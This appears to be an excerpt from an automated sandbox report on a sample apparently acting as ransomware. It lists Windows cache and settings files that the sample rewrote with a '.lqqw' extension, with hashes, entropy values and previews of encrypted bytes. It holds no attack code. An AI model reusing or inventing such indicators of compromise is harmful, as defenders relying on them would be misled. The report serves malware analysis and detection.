                                                                                                                                                                                                    Preview: !......o.;....o..l.@gD,..w.&..s@/ED:~L ...+...OdtP{..!.q....S.g.'^.k....a...b.u.......4.].@....-.......D.!.!.?.....~.....!]p/....R.q..i%.;g%_..;...*.O.c..\..H...-..u..@w.3...%!....r......z..[...j.F.....u.T...-...i.q.w5...,..P{..$..}z....=.!..-}....^.....Fd5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_exif.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.2844213737383665
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:JaqW/HKvfbCXtKxoU1ss5J7Pa66fPtlp7y6qrXbd0dQ/PidxE44Ki75dExcii96Z:0tqvfOXoxoUjDa1flq6qrr2dQ/2pciik
                                                                                                                                                                                                    MD5:4A3E750936866D6A20409B44479C9AE2
                                                                                                                                                                                                    SHA1:C4F6C7CD2FBEE2C46DCB274444FF8922936A8E52
                                                                                                                                                                                                    SHA-256:B24AD7B1331A856F5D5E9FD23FC9D3BD13D053B894BC75C5670D341A58E4FB36
                                                                                                                                                                                                    SHA-512:18E24EE9A4E20B80916F9F4E28D68C1EEDB7347F820214986F64F71F8852943225889050A9DF72DB8B90420E05610F5D3F785038CE5DB68AAEF0A8B6CC0F476A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..I..yX..k.D.z..LQ)../......H..*. ......b.%;R c....rUo(..WW.../.T....M..I.......l%.L.^..m2l+.ef.#,.,......h.......f.G......%.o..0.6...M.}0|..Q..Y...V.4*C......-.Mn\...j//u.#.w.E..$]P5.c.^6"..r.d.L..WeG..v..5.2..j7.#k.d@..n.b|.mu...[...b.C.a....,h..DZ...?.$8b.lG.W....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_sr.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.202422744595292
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:NOuhkKbMupfebke4gwbefqa8LGBDfGvF11HudYnPc9m75dExcii96Z:zMYW4eGDaF5fG4SMcii9a
                                                                                                                                                                                                    MD5:84D98122911BB75B2025F1F573C394E4
                                                                                                                                                                                                    SHA1:F4A1BCC2FF61B2826F63D3E86F138CC438C0C8E2
                                                                                                                                                                                                    SHA-256:9DC1984CA405FBE2CDC8FA828E8736D51FF64BAE084E3DD3C98D3748B378BF33
                                                                                                                                                                                                    SHA-512:135EBFD855F12EAC22870B6290E1BF0F41F2762553C5F6B69AAA347485B5A5C54F3A208FE1C6B8ADFC128FC18806B91BE2C1CF830661567307F79096300CE7C5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 77%.u...a.4v...^.... 0WJ.........)........[....6.).....8....xe...-.&..V..R..di.;..........9...W.f.`^...S,_....v{...a.m5oO..-.f....o.......pj..vagt:n.d;8..e...8.&....V..?...I...._...E.8,....A........7.z.^..m....y4..U..6!Y....[..Q..5t.u..B...Vo.....D.[.X..:5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.244064699197779
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:C3Cy//1DvL3iIblZ4qSxFGmG4hm+yzVlS9nJBD75dExcii96Z:C3Cy/5D3iWlZ4qmFPtbYVl6nJBwcii9a
                                                                                                                                                                                                    MD5:C6D9EF384850DA8CBD9D3526546716E2
                                                                                                                                                                                                    SHA1:1A9E66B4EFCFAA3AB480DF5DDB4AFFDD16AD9A78
                                                                                                                                                                                                    SHA-256:DE6DDE1D819F4B275BFC7AEADE82AE23A49952EFF58DF3362B4499B1F31B677D
                                                                                                                                                                                                    SHA-512:B30F0C469FE6B7BCED9296009C502E1CE2289A434E8C43DD42FDCFB5915458344B7E0694D47B2CC9E6CE5D7549B5EEBC27F3763D158A4760484650DA13BF6D71
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f>....l...g..\b.A..a\@..`.....{O......B.\k.].u&9.X8.9i`.....K.FakD..=Y.R.1...T....S..oE...r/....y..*@..a.'.z...~c..........f+.OgH..*3.&iw..#...['.V.&1.B..*...kn$.H......w\..Yks.X.&...F.h../.+......w.qT.........x.K..fC...'3.......)6.:@.."..k(....u....uTd6...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.206653898969652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:GPuxTUYfW3+n+Mu/QFKmIZcdQB2md3+a+ZRG3sNx76QzsIz2OEQD75dExcii96Z:94YfW3k+MlFZIZcSB2q3FgRGYx76QAwG
                                                                                                                                                                                                    MD5:CEC6F1310E31377329FE4D0071E1A693
                                                                                                                                                                                                    SHA1:0704E6EBCF98069CBB2ED88AC202EFE7782EF0D2
                                                                                                                                                                                                    SHA-256:06F6900B28FE39F4CFFECD2DBA177F6070066D9E6D58B85965B0A353B97E9DCA
                                                                                                                                                                                                    SHA-512:72B56C9DEE5E23785D74F62467FE7F8EB903121E9EE6DADA72FBAA15A5B37D4141B3510F13CD8688612C6A4FF991C04DB53050CA73DE54A87A53BBEC3C51B5A3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <.......p....P...~.<+....&.."`..x.Rg(.[.a&u.....H.E.........../s.}/G..;H..._@.w2.g\....w1...\1.b.V/..[........5...8.QQ6a..{.H.v8.,.2._N%5.;.qs.......3q.5.O...?x..&.fl.+#......G.{.U...!..WI^b.i..L..'.6.8.!B...sW...x-i-h.\.M.c-..7).9.....-.*.*.IL...I..<.!.W*.7.a5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):118270
                                                                                                                                                                                                    Entropy (8bit):7.998591655420999
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:qS7h36lMHtxw+1tBmNNmrDHDP9X4K0cRlCdEO6xmxkJ8Ejym8tJS/wTgiCf0tnN/:d36sxxVq27hXh7rx5J38cwTBRju45dSM
                                                                                                                                                                                                    MD5:158146869C2FE75C21F0A7DB8C15775C
                                                                                                                                                                                                    SHA1:3E624622AD04D621A5A7F632358D0DBB12953AAD
                                                                                                                                                                                                    SHA-256:0649B7F05D9882EEB1FCE38DDA28C2358A25EBB2777B17C20311E8E882A964AA
                                                                                                                                                                                                    SHA-512:F281A375DDDBE4DD1AAC378FDFBE442F6438887680F2C88134F76A5CDC6F2C7CAE6CB621608A4007A8A38FF14BEC9F207A7B27F721200958EA05BC4296C06DAD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Dy......c.:..;._o:.b..........[.../I.M0..k..].p+..R.K1..B{..KgIY...s...L..K.4.gI.M0.....j...........\....yY.T....#....-!...1,..j...u..2Q.e...tS.#.pV....X.......a.....Q.|....G...R\].5R.....%.....RT....&......x..R.f^.......1.6U^C..m.....{v;.4|..c..?....T.....3Qm.$/....n.;.W......,...q...Y.....i...v....3...*...... ....*~.a`........{_.ww....d..CE.>.....;q/.c.Ux^..c.a,..S.i.3...k.zqzy........h,.....l..)....i...rn8.aD..... .....V.A*?...@0...|&..2./.0.3.?....*.29Hd.!.....b.l_.EX...........xt..c..`..c...Uf`'V.u~...M.4}.....0....|`*\....fE........V.}.c.-..[!>%s....C...p...N..)/.Y..zJ..".rY..WmZA.F..g.....UE.......3-.......Qb.....c.'R.h.L......Z$..<UJ{..Y:w/..N.....kEE.*..~......<j....Hg..F.#..q......=P.r0B..K.Fr..ry\(...?....N...w.meo'....3...?O2`;....j...P|...H..1....!.C..~]..e......O.b..i.R............'....=)..G.....7...?]..^.vvc.@.Z..^...{l....?/.B...Y.....[`D....>.?.k.Z...,.../....../........yf...L.r..../..|=..}td...l.9.t=h.M>..;G..2....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\UPPS\UPPS.bin.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16477
                                                                                                                                                                                                    Entropy (8bit):7.987865754234537
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:3zeU5v/qFjibqSqRSYWuWy8NzJMBSEFZBtmU2:jBF/qFWbq5tWdNt0SErmU2
                                                                                                                                                                                                    MD5:5DBD3BB664DA0E732754D9DADAD142FE
                                                                                                                                                                                                    SHA1:8B69876B806A8C96BBA6683FA99F698FD471E9DF
                                                                                                                                                                                                    SHA-256:134648118BFA3338F28DD035FF97267A29E7DA586A0A706F2F52236FCE8BC120
                                                                                                                                                                                                    SHA-512:E3AE7373061529E51E93B5EA29B4F41DE8F8AB31D8F909280B72B6A61D83B7DB9E42A00E222ED99BF96E64BC0D2CC992B4E08829D5A2909EF1A44979B13DE7C5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 7I....Q.x.H!......[.#B.........2..:A.)q...Z...`..cqZ..J..i........&.."..."c8...=8...-....">.3F...\.%.......1..... .#.....wz...+=..98-...).).`3.'.6..........]..w...r.%....wX$.x..-m....}.....km.H.Q..g....L..oxN.# ..d).,.<.&.a..[............t.|(X........xK..H...Fj0.......0.f.eAQ.p....q..3.........4]..O.S..j.oB......O7.s.0im...h.l,..8...}.....^q.w.a......lI..{.".7..5-o2y..6....A.jz.n...@g....=......=^.{.n....6.oG.....O..KhL....hJ.2.j..K1...P..SRZ."=.....d..4.u.1.DI...Q...w....[..K..u>.....c}..U.4.0w.|....1.....qs\.4.u.~...5..?;..."U....V.k..U...W..;.*{...Y.....^.r.^.k'..vM.3..-i........n..A$....T._....o.*.2.....L.....r..%N.../....s..P....u....+....J.F..R/y..C.$.....x.....qF>Q....>...!.<N...{...cx.s..:....8..g.ef......x. ..'M......H.& G.#k..i...4...@...q....4.*....4.....$..e..&z....L2.RU+=..}t...UB...x`..U..3..*.....B}&... ...)...wtc.......0.|.j.k7r..eN..f.a...e.Z...{k1....5?..K..J..>0....9..$.p..... ....V:....|..Y;...>.Z..@*.kg...X..^.s...~k0!
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01.chk.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97487046056124
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:hWQPItJ4dA/47M31V2HpdO++UzxajLISDE1w9MtOKk:x80k33nQu+jgoSD2w9MtY
                                                                                                                                                                                                    MD5:E7BC7A97BB9FAA478BAE5DF386BD4091
                                                                                                                                                                                                    SHA1:30D0AC23229C030479873C1B3F64BC4E151D39F6
                                                                                                                                                                                                    SHA-256:BD9FFCD6B693ACD3F95460A53A50C08B0DE9DE828F885DCAB44F986E92192FF3
                                                                                                                                                                                                    SHA-512:4BA7C4F0EBBACF9B07F782B28AC49BDDFDC418773E861C601561CF8A5310FA3BE169463399E7AA6995F99E2883D2B610F6729D18F26437E74619D5BC0341FAF6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...|+J|hw........0...Qe..*.q...#.....TF.S...y-".U.2...(gG..f#....A.....^d..%.17......D...bFe+.?...%..5,...c....Ba.o]x.G=5..7.........(.Si.......r..L<ED..JQ....r.]..E.7.....N.q.9u.....7.`A.smu$...x.K....s.[.y{.\._g.;;.C....K(C..t..u.....!Q4:.7.;lI...d[Gy$..|.z..:..(..O^..D#...cw.cz.#.P.......#[.....:.Yz.H.e;.%F.1.C8........C..q.7#,f.B...>.)k.?N.0.j.Wk.....b<.o...g..<...}.?...=..f+.i...!....B.....H..n-....s...cP...6p).g......-r}].t.P4......n..7<.}.w.aU...fI...^...<..n...n._.Me..[.F....sm.1:/4.B....>.P..Z....O/........H.....<.y.......F.._.]"..r.^6....u=....F.....ROj....b.. .vw..k.TA...O.j#..0q.#.)F.[.....~.]...v....M.......D#.YZ...=o.w*...f.C..y'.c..!W..C;.......n..... ..F...s..Y.R.7_;.........7~..^.L.7.,.v.c...cd.1..?de..}..Dr.w.s...2..d./`. ~.....m..........."B.q/.j.8MdG.C.P......x...[.&v...M._..b........../%L....t..4-.......NJ.......wD.Tr*..{..\.....]..M.~.c...;.u..]['..")...... ....U.QN+..`.Q..1|.-.F...v.LZ.{2P.8..{S>......pk.,x.h
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000A.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998968486415759
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:WNXhDTxdlaRSPZ0dbesIazJ1I84Q+w4dvi9b0qZK64DPwrXlq:W5hUwB0dbTZnIzQX4dvIb0/7PCXQ
                                                                                                                                                                                                    MD5:8538AEDA00A49F4E12C02B5634C15392
                                                                                                                                                                                                    SHA1:A7DFA21343BA491E987CFB02AA0F4EF21DB47DAC
                                                                                                                                                                                                    SHA-256:749E8E179935178367F0D13FA19B9899B45D3A07E2BA3F0A21F027EA85029A54
                                                                                                                                                                                                    SHA-512:4A91897AEB8A60D23796CD8C774C2F57FFFBC1C2E42BD6F0DC054E64A0B52E2EC1F04AFBABE504CA5A23C7BFBCC1858EC6A87E68E1530874AFFC8EE46FB39034
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..0z=.._...a"W...]..C..M.6A..J..*...l9[]J=(..#z..I.f...'......nG$.[...RsM{lq..U3...s..}..I.........j.B*#.(..l..w....$........hAD.......B.........J.t....N.I....1.... ;....V.............8.L.`....y.n.......b...;...o..E.( .w.j<.%sr~r.Q..K. _.U......%au:...z..+....*J.^....[.K.'~q2.q=~.F(...A&...1..h.u....86.......u..0'.....4*......r2....U"..j....?..!.F.Ph.M.j.Y1..I./.aC6..u...d.Q..w..`^.....b..i.x.G.V......c~u.....2v......xC..6.k.....8.M...fz.._......SLL.l......G.v).....H...y...\..5.Y!%N#.M1K...d.s3...].q._4..%4.-.....hR..y......o'...">.@B.9....i.{p.P..s.`.8..o.. ..iY.....C4Er.rL.......-\.n."..E.......F.}..r.t|.............Qi.Zg;.E.4I/...)...H..p.9.iT.~........[....U.N.w.9cS.q..+}j.pf.N..-{_.8r.3............v....T.i.o.."......F.`..4.t.3Q..I......6.|....5..Gw..Y..n!.....i..K.{.WMs.d...W..>.<@....}#.7.Z.....\....S..+$..........H....f..$@.pl...Z.......i..g.I....2..;.wY.{...j...H.%-.X,.s.f..Y,..'p+..m..L..].{va..s..0..Ey........}m.,.-
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000B.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998814288641655
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:mUcBrK4jbpHRvA800HeAKRrhcCUvcYzvl6hPDB51fogfFEVly2MkYZ3Q:mUurK4ntRh0ITlmDBZfFwKkOg
                                                                                                                                                                                                    MD5:42434CAAC877C889379DCF71B8A3FB7B
                                                                                                                                                                                                    SHA1:27B20801B9BEF8C4965C4C894970F9AD28882873
                                                                                                                                                                                                    SHA-256:5796BD7D3F315B21B1E548D44AD66441C711C84C0D3FACA6C8A3A061AC79C0A3
                                                                                                                                                                                                    SHA-512:6DB86EEC15E7C5751D8AEAAB6B24E8B712D04273A5162742F2BA3AC2BF9DE7E9B1ECAD8BBFAC609F4B53FFA9BBC3B89AC23A5AB15EE4CA8FE5C3A800FFC2CE9C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3..(.J:....m.Um.gGV".."...ym}.>.*(.3...,.t.H{...`<....WL.....d\w.xM].W.....g.mc.1Gd!...Z..j.@...[.^.....U..{Nb3..Z......y.4...!.J".z..,._[4.a....X.zj..#V!.D].nn...Q.)......sF.v....9h....1.#d..O.<r..W.R..?I.T..../.7.bd..W...!...f.p.p..Z.B.~x{.!.Q.<.I.7...;(5.X?.q:..7...d<.@..n..Z..Z..3r.cbR..r..3..3.m.w.97.s.h..n......b.....{a.ol..:~s.D...5..:...C.....\a1...#. ..1.K,....A.y........|..a.a...t.a@.D.1...h.9.h.i..R...{g....$..sd.ff.....;...Z.E....'jI1p?.Qmw.5_y7...?.6...F.F...GJ......c.K.A....h>.K...b.q.-b:4>?.. .......'!..4:.N) ...p...k%8../g.v.:.)..-T....RM.g1@Q.2....Zv[?b..h_..C,.."..].......g...S.G..8..V7...N.%..........s..!4.C:g...Y..;w4|.u..J....6}..;.W.......j.-....)i3..=.J..mZ.1..o...^.A_.]h.m...U..I.\.xkDU.#.U..9.LB...^..Ofvt.P..iz.T...4.B,.@..:...1h_...?.s}..f..#W...|.%...k...G...~.^.r.}..Aa.u.X$..Z.....@RVI....W......Yn...o.8.u..m......v|..kq_.............rF.M.!o.......dW......@......_ ...5.5.....+j6.......m....$.T
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000C.log.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998774882957765
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:UXOoPaLvwYWclUvb+mvu4zdgZt8prS+Vhtq8wLbdczm+IAr:URijUqCu4pgx+Lt0Waw
                                                                                                                                                                                                    MD5:95B1CC14E4F1784546213F8DB0D262D6
                                                                                                                                                                                                    SHA1:AE4902185BA163CC0AACBCD237D5D8909C5F02C8
                                                                                                                                                                                                    SHA-256:E0A10501EAE604F11794B518E51228F3F178365B08EBE10E2FF2A38B7BFE1771
                                                                                                                                                                                                    SHA-512:1509BF9B0AD224CDB435643BB4C3931FDE3CF4A615FB6A856549130B2CEC5307D4E9205B520AEFA8990E73F08B55F4288499FBCEC2D59C9270E1DC04953D83F1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ".......2.".Zz..Z..b...&.... .......7i.."..@.T..[.j..e.X..^?.+S......+...R./l.._..3.T..1.h.....g.N#w.1JV....U"=.G..@......Z.....j.SmO.pu..s...a.|..<.....:E<.rCv...F'.....\}......b.-....|.yr`.W._......./.`..q...8}1].....-.D.7teY>L$...]P...m..[....>.7-..bb.)...7.X..I..WG.Y~.].e.Dv...U.q.pz. ..<.05.]G.=.i...X...J..tPl..c...j.8AlZ...sX .@."E...Q....$........5...j*.A.k..}....=...q....`.k....Z...w.J.....@:....O@....1..a.......UN.:".....P.....rw.3....P..*C.Q.....T.}g.en.|m...A .2yNy...!]]V..~....Lk47.c@D.|E..)......zG..*....roO$O|./..N..?.@..3.+"_"ke.j..\^..D=..W.Ek/.v.l...]m...~.>.o..U........W@....{.,_..'.#.p. ;.W.....0h....)......s.\07...Q.,.....o`@.....S.?.v....z..P..I.........4.X..(e..P.C.4...jh....h.m".`.9.B......i._1....%..Fv.g......_.BB...bI...y....w...a...f.yb..(]._.o..U.[......m...!....EnD.....)p.m.F.....5.M\*.......6..".,...=........t.$^d.(`P..5i..<.~xK.p.Lt..G..{.....`<k...........P...|.......3?..0...,.`.....l..k..#..N+......Z..%EK.Q.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00001.jrs.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998830259168441
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:g5vaQSEI2s21V3JXTcsS+6LthoTrvBdqeshTVqEqCU89jh:IaQSEIF2XtZ6L8BdXCTVZQs
                                                                                                                                                                                                    MD5:FAAFA545EB4AAEDFF5D9A858A0EEEB63
                                                                                                                                                                                                    SHA1:3223A848BFCF93DD26F41FC6EE8C3BE763F7E4F2
                                                                                                                                                                                                    SHA-256:8711B4A8461F02B77933F8C781B649D993D29D55D1852DD78D74EF8DC2561D67
                                                                                                                                                                                                    SHA-512:57A04A2B1C1A5CB8C8202EA3043D0A7531C780042C06596FAF673F94FD207F3A72A07CBFBA9B50C7DF1B6B72CDEDD58F936E2863D864DBF06DE1D15E069A6C87
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: G....M.b.K..*i........1..R.............R.-.I..;..l...........{.............5b...u.<4.80..0.7~C...]Qm.=...A.e]f.......z...'5..9k..1...G.4..UP`...j.(....:n1S..0..w.|.m.9....o.`..D.Ri...;.jeWr$.l9.7.e....ps.F"...C../..T..^A$[..,&,O.;.....*.D./.n'....>,;....N.m.e.`..OC.p...$.uT.<.aGx.L...k..............1...dz.I..)...<..H..........1..B...IDx.G...^W..M..k$)c?..w.T..X..u/.WQr..mWJK...9[...%G....]_........9..~.....q.C..F.....K#G.q....8.;.[[X.A.?.Z........C=`U....)S<f.r.R.w...y.^9xj..*...kqA......|..@...Nzo.[<%..O.E4..`0f...Q...I.]LW.j$},g..x....QR~... .>.U...f{.6u.|-...!to..V.3..B6.....p._..N..7..O..t..x..p.[.vH|w...o..[.;.j..t..L..I..M........[..Ox;.A....<R.-.?.e-.....F.&..EJ.]z.@..Lk.'.O...-......i!jm...Oq....,.........YS.q.J...\!P.....")K..NH.].)<<^..l.....G.@...k.?.....1.|...e.....R<0+.BJ+...............lc.T...ZY.....a..B.S........*.4r`S..............."..FY....+|...H.R...K...&t. ..g.O.f....W...s.E...Q.h.6s....ZAF.4;..g.\.....$.!...Z}..".a.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00002.jrs.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998871970637879
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:KD8tlzxLAsFKw88JsNwK6fwpVQyD0x5A5pt5teO/PXRYso1tl98B7yf:K4tx629JYw5fw4Yi5YpS13l2xyf
                                                                                                                                                                                                    MD5:994D509CD526A22BB700467640EE9B76
                                                                                                                                                                                                    SHA1:C1262FE4D930A908853E193BDC1EF90C605F6A08
                                                                                                                                                                                                    SHA-256:9ABE37171F8B5241EB1FC4C69ED0BF637D9F5F876D0F425E1DC4F532E18A7F1E
                                                                                                                                                                                                    SHA-512:7C20E76A47382FD03B1CCDB0C2180789C53EB62BE1FE716DC1DE4F2D589B78CEB3F47EE30B63EE7ACA58A8D02A7C78F0D7159C79497F8476EFDF0D61553877C5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: "..@...........T.6....R.ad.?.%.?.hk...8S. 6(.. .s...g....B.J.T0.n..q-..{%...R......V.C4...H.......).V".F..@=1.e*../M...|.oo.-z..*...B*...U..jx.<A....9.6<....... P..SY.b?FLf.}?..u.E.......>b.Y..x...4H...oe;.....}XE.*...h....=.....J.g..........L.#..(.T.b]!!.8.....s`..Q7.j...i}.u.U...G.c...a.U...G.G.'}.3.~"K....dG.?H.......aj..\.....W.w.1+Ju^.Q....0.^T.8.....[Y..}X...@J..J.....$X..cW.q.........Yw...Q.f..(g.aJe\...#...=|..R.u............?@.w<..`....p9....U.xjHQh...j..=.>...5...L0=....CDD..<..4w.?....y0..(h...X..U..5.E.u..PB3 [.e....V..$b...h.p.o.fY......(...v......).Q>.C.F..S..{X.I7....Pb....."!P..!........kg.J@.S.&b.O..8`.@%..l=x.s.%v... t...M.mDF}m.:..F2T..uW.5I..nr O.[.........;L.#&t....2...uj..MN....g..r.C./..O.U.D.X..@.5......M..l..W.^..~.U0.."..Z..0..N...0..X..;.........N.G2QsA......sR...[. .!..il..H.G)r..Yp..D;.m.>.r.c}.....C....H..b..A......P...bj....l#%.kWT.F.|G....>S...Yy..(.Zz..v..\.....-.vp.....|.<..Y....-......H@'..yb......F....9....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975560436548248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:SDNNHbM5hsto8UUsY/qsWlXnMWh31BS+sAv1Hw2FjQ9gFcC6yL:s5hoFBfLlXlBSUHs2Zl
                                                                                                                                                                                                    MD5:183EC9C93692B770725B05763AC44DAA
                                                                                                                                                                                                    SHA1:F0AA5C3CDE5B9B03850B3A6F0A0A9820F959B94A
                                                                                                                                                                                                    SHA-256:6CD7E565EBD29F3F2E3196871D407718B856AD8273C159B445FC05D7577BBD7E
                                                                                                                                                                                                    SHA-512:358CE1CD470CC03EA7D9983B5A47BB5E9278AE96DEC176BFAE1CBC54EC7009011E3F8A6D53E3C7B6833ABEA1EA46A7A5C0AE747819B217A56544719616E8903C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
